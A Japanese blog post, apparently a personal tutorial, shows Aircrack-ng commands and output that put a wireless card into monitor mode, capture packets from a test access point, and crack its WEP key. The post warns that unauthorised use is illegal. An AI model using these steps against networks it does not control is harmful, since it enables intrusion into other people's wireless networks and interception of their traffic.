ubuntuでAircrack-ngを使ってみた 1

Eee PC 901-16Gにインストールしたubuntu 9.04でAircrack-ngを使ってみました。
Aircrack-ngで使用できる無線LANチップは、ここで確認できます。
Eee PC 901-16G標準のRalink RT2860 STAでは動きません。

Aircrack-ngのインストール

$ sudo aptitude install aircrack-ng

インストールされる主なツール類は、以下の通り。

  • airmon-ng ->無線LANカードをモニタモードにする。無線LANカードを使っているプロセスを確認する。
  • airodump-ng ->無線LANパケットキャプチャ。
  • aircrack-ng ->airodump-ngで取得したパケットを解析する。
  • aireplay-ng ->アクセスポイントを突っついて、解析に必要なパケットを増幅されるなどのサポートツール。
  • packetforge-ng ->パケット偽造ツール。

無線LANカードをモニタモードへ

まずは、無線LANカードを使っているプロセスを確認します。

$ sudo airmon-ng check
Found 5 processes that could cause trouble.
If airodump-ng, aireplay-ng or airtun-ng stops working after
a short period of time, you may want to kill (some of) them!

PID	Name
2720	NetworkManager
2741	wpa_supplicant
2745	avahi-daemon
2746	avahi-daemon
3303	dhclient
Process with PID 3303 (dhclient) is running on interface wlan0

いろいろ動いてますが、とりあえず無線LANネットワークに接続している場合は、無線LANインタフェース(wlan0)を無効化します。
再度、プロセスを確認します。

$ sudo airmon-ng check
Found 4 processes that could cause trouble.
If airodump-ng, aireplay-ng or airtun-ng stops working after
a short period of time, you may want to kill (some of) them!

PID	Name
2720	NetworkManager
2741	wpa_supplicant
2745	avahi-daemon
2746	avahi-daemon

dhclientの停止を確認し、モニタモードに移行します。

$ sudo airmon-ng start wlan0
Interface	Chipset		Driver

wlan0		Intel 3945ABG	iwl3945 - [phy0]
				(monitor mode enabled on mon0)

モニタモード移行後のインタフェース名は「mon0」となります。
モニタモードを停止する場合は、「stop」オプションを使います。

アクセスポイントの確認

モニタモードに移行したところで、以下のコマンドを実行しアクセスポイントの情報を収集します。

$ sudo airodump-ng mon0
 BSSID              PWR  Beacons    #Data, #/s  CH  MB   ENC  CIPHER AUTH ESSID                                                    
                                                                                                                                    
 XX:XX:XX:XX:XX:XX  -87        3        0    0   7  54e  WEP  WEP         TEST-AP

 BSSID              STATION            PWR   Rate    Lost  Packets  Probes                                                          
                                                                                                                                                                                                     
 XX:XX:XX:XX:XX:XX  xx:xx:xx:xx:xx:xx  -89    0 - 1     43        4


上段がアクセスポイント情報、下段がアクセスポイントに接続しているクライアント情報です。

パケットキャプチャ、解析

収集したアクセスポイント情報を元にパケットをキャプチャします。

$ sudo airodump-ng --channel 7 --bssid XX:XX:XX:XX:XX:XX -w wepcap mon0

ターゲットのアクセスポイントを指定して、パケットをキャプチャします。
「-w」オプションで保存するファイルを指定します。
上記の場合、「wepcap-01.cap」というファイル名で保存されます。
次に、保存したパケットキャプチャを解析します。

$ sudo aircrack-ng wepcap-01.cap
Opening weptestcap-01.cap
Read 278993 packets.

   #  BSSID              ESSID                     Encryption

   1  XX:XX:XX:XX:XX:XX  TEST-AP                   WEP (54632 IVs)

Choosing first network as target.

Opening wepcap-01.cap
Attack will be restarted every 5000 captured ivs.
Starting PTW attack with 54632 ivs.
                         KEY FOUND! [ ZZ:ZZ:ZZ:ZZ:ZZ ] 
	Decrypted correctly: 100%

解析には、3〜5万パケット程度、必要なようです。

まとめ

今回は、Aircrack-ngの基本的な使い方を確認しました。
アクセスポイントに接続されているクライアントが動画などを観ていれば、3〜5万のパケットも短時間でキャプチャ可能です。
次は、キャプチャできるパケットが少ない場合、アクセスポイントにクライアントが接続されていない場合、WEP以外の暗号化の場合などの環境下での使用を確認したいと思います。
最後に、ハッキング行為は「不正アクセス禁止法」に触れる犯罪ですので、Aircrack-ngの使用は自身の管理するネットワークで行ってください。
また、Aircrack-ngは、自己責任で使用してください。


Main [Aircrack-ng]